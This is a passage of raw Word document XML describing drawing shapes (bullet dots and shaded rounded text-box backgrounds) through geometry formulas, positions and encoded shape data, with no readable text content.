                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 3287 3287"/>
                              <a:gd name="T27" fmla="*/ 3287 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 3287 3287"/>
                              <a:gd name="T31" fmla="*/ 3287 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 3309 3287"/>
                              <a:gd name="T35" fmla="*/ 3309 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 3449 3287"/>
                              <a:gd name="T39" fmla="*/ 3449 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 3469 3287"/>
                              <a:gd name="T43" fmla="*/ 3469 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742"/>
                              <a:gd name="T46" fmla="+- 0 3470 3287"/>
                              <a:gd name="T47" fmla="*/ 347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2"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="741" y="162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Text Box 43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287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&amp;#00060;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3" o:spid="_x0000_s1980" style="position:absolute;margin-left:96.5pt;margin-top:164.35pt;width:37.1pt;height:9.15pt;z-index:-15553024;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,3287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">
                <v:shape id="Freeform 435" o:spid="_x0000_s1981" style="position:absolute;left:1930;top:3287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CZbMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3YrCMBSE7xd8h3AEbxZN1EW0GkUE0V0E8ecBDs2x&#10;LTYnpYm1vv1mYcHLYWa+YRar1paiodoXjjUMBwoEcepMwZmG62Xbn4LwAdlg6Zg0vMjDatn5WGBi&#10;3JNP1JxDJiKEfYIa8hCqREqf5mTRD1xFHL2bqy2GKOtMmhqfEW5LOVJqIi0WHBdyrGiTU3o/P6yG&#10;3feh9O0V9/aCs+HP8a4OzafSutdt13MQgdrwDv+390bD13gMf2fi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AmWzEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m720,183r-699,l18,182,,162r,-4l,22,21,,720,r21,22l741,162r-18,20l720,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,3470;21,3470;18,3469;0,3449;0,3445;0,3309;21,3287;720,3287;741,3309;741,3449;723,3469;720,3470" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 434" o:spid="_x0000_s1982" type="#_x0000_t202" style="position:absolute;left:1930;top:3287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c+1cYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNVNq4hN3YgUBUEojemhx9fs&#10;M1mSfRuzq8Z/7xYKHoeZ+YZZLAfbijP13jhW8DJOQBCXThuuFHwXm+c5CB+QNbaOScGVPCyzx4cF&#10;ptpdOKfzPlQiQtinqKAOoUul9GVNFv3YdcTRO7jeYoiyr6Tu8RLhtpWvSTKTFg3HhRo7+qipbPYn&#10;q2D1w/naHD9/v/JDboriLeHdrFFq9DSs3kEEGsI9/N/eagXTyR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c+1c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&amp;#00060;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6396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2357755</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="431" name="Freeform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3761 3713"/>
                            <a:gd name="T3" fmla="*/ 3761 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 3761 3713"/>
                            <a:gd name="T7" fmla="*/ 3761 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 3761 3713"/>
                            <a:gd name="T11" fmla="*/ 3761 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 3740 3713"/>
                            <a:gd name="T15" fmla="*/ 3740 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 3734 3713"/>
                            <a:gd name="T19" fmla="*/ 3734 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 3713 3713"/>
                            <a:gd name="T23" fmla="*/ 3713 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 3713 3713"/>
                            <a:gd name="T27" fmla="*/ 3713 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 3737 3713"/>
                            <a:gd name="T31" fmla="*/ 3737 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 3740 3713"/>
                            <a:gd name="T35" fmla="*/ 3740 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 3761 3713"/>
                            <a:gd name="T39" fmla="*/ 376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FF0A2" id="Freeform 432" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:185.65pt;width:2.45pt;height:2.45pt;z-index:-1555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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,2388235;13335,2388235;11430,2388235;0,2374900;0,2371090;13335,2357755;17780,2357755;31115,2372995;31115,2374900;17780,238823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6448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2311400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="428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3640"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="429" name="Freeform 431"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="3639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3822 3640"/>
                              <a:gd name="T3" fmla="*/ 3822 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 3822 3640"/>
                              <a:gd name="T7" fmla="*/ 3822 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 3821 3640"/>
                              <a:gd name="T11" fmla="*/ 3821 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 3801 3640"/>
                              <a:gd name="T15" fmla="*/ 3801 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 3798 3640"/>
                              <a:gd name="T19" fmla="*/ 3798 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 3661 3640"/>
                              <a:gd name="T23" fmla="*/ 3661 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 3640 3640"/>
                              <a:gd name="T27" fmla="*/ 3640 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 3640 3640"/>
                              <a:gd name="T31" fmla="*/ 3640 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 3661 3640"/>
                              <a:gd name="T35" fmla="*/ 3661 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 3801 3640"/>
                              <a:gd name="T39" fmla="*/ 3801 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 3821 3640"/>
                              <a:gd name="T43" fmla="*/ 3821 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827"/>
                              <a:gd name="T46" fmla="+- 0 3822 3640"/>
                              <a:gd name="T47" fmla="*/ 38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1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Text Box 43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639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&amp;#000060;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9" o:spid="_x0000_s1983" style="position:absolute;margin-left:96.5pt;margin-top:182pt;width:41.35pt;height:9.15pt;z-index:-15552000;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,3640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">
                <v:shape id="Freeform 431" o:spid="_x0000_s1984" style="position:absolute;left:1930;top:3639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wNV8YA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KEXkrdNBRpomswFWkPXrRBcnxk&#10;n0kw+zZkV03/fVcQehxm5htmmY2mE1caXGtZwdssAkFcWd1yraD42b5+gHAeWWNnmRT8koNsNXla&#10;Yqrtjfd0PfhaBAi7FBU03veplK5qyKCb2Z44eCc7GPRBDrXUA94C3HQyjqK5NNhyWGiwp8+GqvPh&#10;YhTs8k2dbI9fvpRxkbycyxx1tVfqeTquFyA8jf4//Gh/awXvcQL3M+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wNV8YAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m805,182r-784,l18,181,,161r,-3l,21,21,,805,r21,21l826,161r-17,20l805,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,3822;21,3822;18,3821;0,3801;0,3798;0,3661;21,3640;805,3640;826,3661;826,3801;809,3821;805,3822" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 430" o:spid="_x0000_s1985" type="#_x0000_t202" style="position:absolute;left:1930;top:3639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w41sIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/Y/hDfwNlM3kVmNImMDQRDbevD4bJ5t&#10;sHnpmqj1vzcHYceP7/d82dtGXKnzxrGC0TABQVw6bbhSsC9+379A+ICssXFMCu7kYbl4fZljqt2N&#10;M7rmoRIxhH2KCuoQ2lRKX9Zk0Q9dSxy5k+sshgi7SuoObzHcNvIjSSbSouHYUGNL3zWV5/xiFawO&#10;nP2Yv+1xl50yUxTThDeTs1KDt341AxGoD//ip3utFYw/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3DjW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&amp;#000060;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6499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2573655</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="427" name="Freeform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4102 4053"/>
                            <a:gd name="T3" fmla="*/ 4102 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 4102 4053"/>
                            <a:gd name="T7" fmla="*/ 4102 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 4101 4053"/>
                            <a:gd name="T11" fmla="*/ 4101 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 4080 4053"/>
                            <a:gd name="T15" fmla="*/ 4080 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 4074 4053"/>
                            <a:gd name="T19" fmla="*/ 4074 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 4053 4053"/>
                            <a:gd name="T23" fmla="*/ 4053 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 4053 4053"/>
                            <a:gd name="T27" fmla="*/ 4053 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 4077 4053"/>
                            <a:gd name="T31" fmla="*/ 4077 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 4080 4053"/>
                            <a:gd name="T35" fmla="*/ 4080 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 4102 4053"/>
                            <a:gd name="T39" fmla="*/ 4102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58611" id="Freeform 428" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:202.65pt;width:2.45pt;height:2.45pt;z-index:-15551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" path="m28,49r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,2604770;13335,2604770;11430,2604135;0,2590800;0,2586990;13335,2573655;17780,2573655;31115,2588895;31115,2590800;17780,260477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6550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2527300</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="424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3980"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="425" name="Freeform 427"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="3980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4162 3980"/>
                              <a:gd name="T3" fmla="*/ 4162 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 4162 3980"/>
                              <a:gd name="T7" fmla="*/ 4162 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 4162 3980"/>
                              <a:gd name="T11" fmla="*/ 4162 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 4141 3980"/>
                              <a:gd name="T15" fmla="*/ 4141 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 4138 3980"/>
                              <a:gd name="T19" fmla="*/ 4138 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 4001 3980"/>
                              <a:gd name="T23" fmla="*/ 4001 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 3980 3980"/>
                              <a:gd name="T27" fmla="*/ 3980 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2820 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 3980 3980"/>
                              <a:gd name="T31" fmla="*/ 3980 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2842 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 4001 3980"/>
                              <a:gd name="T35" fmla="*/ 4001 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2842 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 4141 3980"/>
                              <a:gd name="T39" fmla="*/ 4141 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2824 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 4162 3980"/>
                              <a:gd name="T43" fmla="*/ 4162 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2820 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 912"/>
                              <a:gd name="T46" fmla="+- 0 4162 3980"/>
                              <a:gd name="T47" fmla="*/ 416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980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&amp;#0000060;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5" o:spid="_x0000_s1986" style="position:absolute;margin-left:96.5pt;margin-top:199pt;width:45.6pt;height:9.15pt;z-index:-15550976;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,3980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">
                <v:shape id="Freeform 427" o:spid="_x0000_s1987" style="position:absolute;left:1930;top:3980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ApCcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3WrCQBSE74W+w3IK3plNg7UaXaWI/REK4s8DHLKn&#10;2dDs2SS71fTtu4Lg5TAz3zCLVW9rcabOV44VPCUpCOLC6YpLBafj22gKwgdkjbVjUvBHHlbLh8EC&#10;c+0uvKfzIZQiQtjnqMCE0ORS+sKQRZ+4hjh6366zGKLsSqk7vES4rWWWphNpseK4YLChtaHi5/Br&#10;FbTvu4r4Y5O1rXcvx+LLmO2sV2r42L/OQQTqwz18a39qBePsGa5n4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gCkJxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m890,182r-869,l18,182,,161r,-3l,21,21,,890,r22,21l912,161r-18,21l890,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,4162;21,4162;18,4162;0,4141;0,4138;0,4001;21,3980;890,3980;912,4001;912,4141;894,4162;890,4162" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 426" o:spid="_x0000_s1988" type="#_x0000_t202" style="position:absolute;left:1930;top:3980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CT5M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dJ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oJPk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&amp;#0000060;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6601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2797175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="423" name="Freeform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4454 4405"/>
                            <a:gd name="T3" fmla="*/ 4454 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 4454 4405"/>
                            <a:gd name="T7" fmla="*/ 4454 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 4453 4405"/>
                            <a:gd name="T11" fmla="*/ 4453 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 4433 4405"/>
                            <a:gd name="T15" fmla="*/ 4433 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 4426 4405"/>
                            <a:gd name="T19" fmla="*/ 4426 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 4405 4405"/>
                            <a:gd name="T23" fmla="*/ 4405 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 4405 4405"/>
                            <a:gd name="T27" fmla="*/ 4405 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 4430 4405"/>
                            <a:gd name="T31" fmla="*/ 4430 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 4433 4405"/>
                            <a:gd name="T35" fmla="*/ 4433 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 4454 4405"/>
                            <a:gd name="T39" fmla="*/ 4454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ABE90" id="Freeform 424" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:220.25pt;width:2.45pt;height:2.45pt;z-index:-15550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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,2828290;13335,2828290;11430,2827655;0,2814955;0,2810510;13335,2797175;17780,2797175;31115,2813050;31115,2814955;17780,282829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6652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2750820</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="308610" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="420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610" cy="116205"/>
                          <a:chOff x="1930" y="4332"/>
                          <a:chExt cx="486" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="421" name="Freeform 423"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="4332"/>
                            <a:ext cx="486" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2395 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 486"/>
                              <a:gd name="T2" fmla="+- 0 4515 4332"/>
                              <a:gd name="T3" fmla="*/ 4515 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 486"/>
                              <a:gd name="T6" fmla="+- 0 4515 4332"/>
                              <a:gd name="T7" fmla="*/ 4515 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 486"/>
                              <a:gd name="T10" fmla="+- 0 4514 4332"/>
                              <a:gd name="T11" fmla="*/ 4514 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 486"/>
                              <a:gd name="T14" fmla="+- 0 4494 4332"/>
                              <a:gd name="T15" fmla="*/ 4494 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 486"/>
                              <a:gd name="T18" fmla="+- 0 4490 4332"/>
                              <a:gd name="T19" fmla="*/ 4490 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 486"/>
                              <a:gd name="T22" fmla="+- 0 4353 4332"/>
                              <a:gd name="T23" fmla="*/ 4353 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 486"/>
                              <a:gd name="T26" fmla="+- 0 4332 4332"/>
                              <a:gd name="T27" fmla="*/ 4332 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2395 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 486"/>
                              <a:gd name="T30" fmla="+- 0 4332 4332"/>
                              <a:gd name="T31" fmla="*/ 4332 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2416 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 486"/>
                              <a:gd name="T34" fmla="+- 0 4353 4332"/>
                              <a:gd name="T35" fmla="*/ 4353 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2416 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 486"/>
                              <a:gd name="T38" fmla="+- 0 4494 4332"/>
                              <a:gd name="T39" fmla="*/ 4494 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2398 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 486"/>
                              <a:gd name="T42" fmla="+- 0 4514 4332"/>
                              <a:gd name="T43" fmla="*/ 4514 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2395 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 486"/>
                              <a:gd name="T46" fmla="+- 0 4515 4332"/>
                              <a:gd name="T47" fmla="*/ 451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86" h="183">
                                <a:moveTo>
                                  <a:pt x="46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65" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="486" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="486" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="468" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="46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4332"/>
                            <a:ext cx="48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&amp;#60;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1" o:spid="_x0000_s1989" style="position:absolute;margin-left:96.5pt;margin-top:216.6pt;width:24.3pt;height:9.15pt;z-index:-15549952;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,4332" coordsize="48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">
                <v:shape id="Freeform 423" o:spid="_x0000_s1990" style="position:absolute;left:1930;top:4332;width:486;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="48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QvKMcA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3WrCQBSE7wu+w3IK3pS6iUopqWsQS0GEitqC9O6Q&#10;PSah2bMxu+bn7buC0MthZr5hFmlvKtFS40rLCuJJBII4s7rkXMH318fzKwjnkTVWlknBQA7S5ehh&#10;gYm2HR+oPfpcBAi7BBUU3teJlC4ryKCb2Jo4eGfbGPRBNrnUDXYBbio5jaIXabDksFBgTeuCst/j&#10;1Sh4/zkM3W5zeTp9Oqy6rT/tz3Km1PixX72B8NT7//C9vdEK5tMYbmfC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w0LyjHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m465,183r-444,l18,182,,162r,-4l,21,21,,465,r21,21l486,162r-18,20l465,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="465,4515;21,4515;18,4514;0,4494;0,4490;0,4353;21,4332;465,4332;486,4353;486,4494;468,4514;465,4515" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 422" o:spid="_x0000_s1991" type="#_x0000_t202" style="position:absolute;left:1930;top:4332;width:48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uV58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e9p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m5Xn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&amp;#60;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6704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3013075</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="419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4794 4745"/>
                            <a:gd name="T3" fmla="*/ 4794 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 4794 4745"/>
                            <a:gd name="T7" fmla="*/ 4794 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 4793 4745"/>
                            <a:gd name="T11" fmla="*/ 4793 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 4773 4745"/>
                            <a:gd name="T15" fmla="*/ 4773 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
